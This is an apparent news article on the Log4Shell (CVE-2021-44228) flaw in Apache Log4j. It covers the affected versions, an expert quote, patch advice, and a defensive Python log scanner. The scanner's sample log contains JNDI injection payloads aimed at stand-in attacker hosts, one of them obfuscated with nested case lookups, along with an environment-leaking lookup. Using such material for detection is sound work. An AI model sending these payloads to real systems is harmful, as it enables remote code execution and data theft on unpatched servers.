With millions of Java applications using vulnerable Log4j library code, hackers will be exploiting unpatched systems for years to come.
Last week a new, particularly dangerous critical vulnerability was discovered in the Apache Log4j library. Log4Shell, also known as LogJam (CVE-2021-44228), is a Remote Code Execution (RCE) vulnerability that lets attackers execute arbitrary code and potentially take full control of an affected system. The CVE has been rated 10 out of 10 in severity.
Any of the millions of Java applications that use a vulnerable version (2.0-beta9 through 2.14.1) of the Apache Logging Project's open-source logging library is susceptible to this CVE. The cause is a ‘lookup mechanism’ in Log4j that expands strings written in a special syntax. Attackers can abuse this mechanism by crafting a custom prefix in that syntax so that the application sends information to a server under their control. This can ultimately lead to arbitrary code execution or a leak of confidential information.
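As an added illustration of the defensive side of the lookup mechanism described above (example code written for this article, not Kaspersky's or the Log4j project's), the following scanner runs over a few constructed access-log lines and flags lookup syntax in client-supplied fields. Because Log4j evaluates nested lookups, the scanner collapses the documented lower/upper case-changing lookups before matching, so a lookup hidden behind nesting is still reported; the log format and the .example hostnames are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample log lines (hypothetical access-log format);
# hosts use the reserved .example domain.
SAMPLE_LOG = """\
2021-12-13T10:00:01Z web01 GET /index.html ua="Mozilla/5.0"
2021-12-13T10:00:02Z web01 GET /login ua="${jndi:ldap://attacker.example/a}"
2021-12-13T10:00:03Z web02 GET /search q="${${lower:J}ndi:rmi://evil.example:1099/x}"
2021-12-13T10:00:04Z web02 GET /health ua="curl/7.79 ${env:HOME}"
"""

# Log4j's documented lower/upper lookups change the case of their argument;
# Log4j resolves nested lookups innermost-first, so the detector does the same.
CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# A JNDI lookup with its scheme and host, e.g. ${jndi:ldap://host/path}.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s:]+)", re.IGNORECASE)

@dataclass
class Finding:
    line_no: int
    severity: str          # "critical" (JNDI lookup) or "suspicious" (other lookup)
    scheme: Optional[str]  # ldap, rmi, ... for JNDI findings
    host: Optional[str]    # host the lookup would make the application contact
    line: str

def normalize(text: str) -> str:
    """Collapse nested lower/upper lookups until nothing changes, so the
    lookup name behind the nesting becomes visible to the matcher."""
    prev = None
    while prev != text:
        prev = text
        text = CASE_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(), text)
    return text

def scan_line(line_no: int, line: str) -> Optional[Finding]:
    norm = normalize(line)
    m = JNDI_RE.search(norm)
    if m:
        return Finding(line_no, "critical", m.group(1).lower(), m.group(2), line)
    if "${" in norm:  # any lookup syntax in client data deserves a look
        return Finding(line_no, "suspicious", None, None, line)
    return None

def scan_log(text: str) -> List[Finding]:
    return [f for n, l in enumerate(text.splitlines(), start=1)
            if (f := scan_line(n, l)) is not None]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.severity} scheme={f.scheme} host={f.host}")
```

The hosts reported for critical findings are the values to feed into egress blocking and alerting; anything flagged suspicious is worth reviewing because other lookups can also leak environment data.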
According to Evgeny Lopatin, a security expert at Kaspersky: “What makes this vulnerability particularly dangerous is not only the fact that attackers can gain complete control over the system, but how easy it is to exploit. Even an inexperienced hacker can take advantage of it—and we’re already seeing cybercriminals actively looking for software to exploit with this CVE. However, the good news is that a strong security solution can go a long way in keeping users protected.”
To safeguard against this vulnerability, development teams should install the most recent version of the library, 2.15.0. Where the library is used inside a third-party product, monitor for and promptly install updates from the software provider.
Beyond applying the necessary vendor patches and following the Apache Log4j project's guidance, IT defenders should consult their cybersecurity vendors for precautions specific to the products they use.
For an urgent in-depth discussion of Log4Shell and a live Q&A, readers can register for Kaspersky’s webinar on 17 December at 9pm SGT (4pm GMT+3), either to attend the event or to receive a post-event recording.